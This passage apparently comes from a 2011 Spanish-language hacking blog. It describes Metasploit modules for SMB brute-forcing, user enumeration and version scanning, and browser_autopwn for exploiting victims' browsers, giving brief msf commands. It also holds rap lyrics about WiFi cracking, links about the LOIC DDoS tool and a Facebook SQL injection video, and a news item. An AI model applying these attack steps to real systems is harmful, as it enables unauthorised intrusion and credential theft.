El modulo smb_login permite validar el acceso en todos los sistemas de la red a través del protocolo SMB, además maneja una cantidad de opciones mayor a la de otros módulos, entre ellas se tiene la opción de cargar archivos que contengan nombres de usuario y contraseñas, aumentar la velocidad del ataque de fuerza bruta entre otras.

SMB LOOKUPSID

El modulo smb_lookupsid permite determinar que usuarios ahí creados en cada una de las maquinas de la red, esta función es de gran utilidad a la hora de realizar futuros ataques de fuerza bruta.

SMB VERSION

Este modulo permite escanear un rango de direcciones IP en la red para determinar la versión del servicio SMB en cada máquina, así mismo permite visualizar el sistema operativo con el que cuenta cada una de los equipos a los cuales se puede tener acceso, el resultado con o sin credenciales de usuario / contraseña no varía de forma significativa en los resultados.

Tenemos unos Cuantos MAS =)

msf > search smb/smb

Browser Autopwn

2011-11-01T08:46:00.004-06:00

Metasploit ofrece la posibilidad de lanzar exploits de acuerdo al la versión del browser que la victima este utilizando, es decir que si el usuario usa Firefox como su explorador predeterminado no se tendrán en cuenta (al momento de ejecutar el ataque) exploits para Internet Explorer.

Para usar esta característica se debe ejecutar el modulo:

msf > use server/browser_autopwn

y cambiar las opciones requeridas como LHOST y URIPATH.

Este ataque puede ser efectuado también para todos los tipos de exploradores existentes como son:

Firefox
Internet Explorer
Opera
Safari
Chrome, etc.

Hacker Rap Subtitulado - smdani (Tron edition)

2011-10-31T09:04:00.002-06:00

http://youtu.be/Qkwdm5SWLGM
Descarga el tema original en: http://bit.ly/h0LJlJ

Toda tu mente siente la atracción
de la inquietud, romper barreras, la superación
bajo las yemas de tus dedos un teclado
pupilas dilatadas y el corazón acelerado.

Suplanto MAC identidad, y expulso a los clientes,
capturo en modo monitor, e inyecto más paquetes,
rubik resuelvo sentado en el sillón
aircrack se ejecuta reventando encriptación.

Desde niño entre chips y cables,
comprender e inconformismo siempre fueron las constantes,
deseando subyugar a la tecnología,
bajo el mando de mi voluntad, me divertía.

Procesadores y teclados revolucionaron
mi imaginación se desbordaba programando.
Soluciono los problemas imposibles sin dilemas,
imparable acometida de mi mente a tus sistemas.

No sólo existe lo que ves, no seas zafio
en franjas inaudibles viajan ondas, portan datos,
la materia más preciada, información,
viaja por el aire y es posible realizar intercepción

Nuevo terreno, de escanear es tiempo
backtrack se ejecuta interpretando lo que lleva el viento
la zona está petada de WEP y WPA,
en mis labios la sonrisa, tiempo es de trabajar.

Suplanto MAC identidad, y expulso a los clientes,
capturo en modo monitor, e inyecto más paquetes,
rubik resuelvo sentado en el sillón
aircrack se ejecuta reventando encriptación.

Suplanto MAC identidad, y expulso a los clientes,
capturo en modo monitor, e inyecto más paquetes,
rubik resuelvo sentado en el sillón
aircrack se ejecuta reventando encriptación.

Autor: smdani
Año: 2009
Género: rap
Base: Kiwi kon almendras y salsa rosa - Jonan

LOIC: la herramienta DDoS utilizada por Anonymous : hackplayers

2011-09-28T20:20:00.000-05:00

LOIC: la herramienta DDoS utilizada por Anonymous : hackplayers: "LOIC (Low Orbit Ion Cannon o Cañón de Iones de Órbita Baja) es una aplicación de pruebas de estrés en red de código abierto, escrita en C# y desarrollada por Praetox Technologies.
"

'via Blog this'

Cierra las puertas traseras con CloseTheDoor : hackplayers

2011-09-28T20:17:00.000-05:00

Cierra las puertas traseras con CloseTheDoor : hackplayers: "Como todos sabéis, los backdoors o puertas traseras remotas son utilizados frecuentemente para mantener el acceso a los sistemas comprometidos. Generalmente se dividen tres en categorías: Network Socket Listeners, troyanos o Covert Channels."

'via Blog this'

www.Facebook.com SQL Injection | @TurkAslanlari - YouTube

2011-09-03T12:58:00.000-05:00

www.Facebook.com SQL Injection | @TurkAslanlari - YouTube: www.Facebook.com SQL Injection | @TurkAslanlari

Apple instala su iCloud en la nube de Microsoft

2011-09-02T10:03:00.001-05:00

DiarioTi: Diario Tecnologías de la Información: La publicación británica The Register informa que Apple ha seleccionado Microsoft Azure y AWS de Amazon para implementar su servicio iCloud.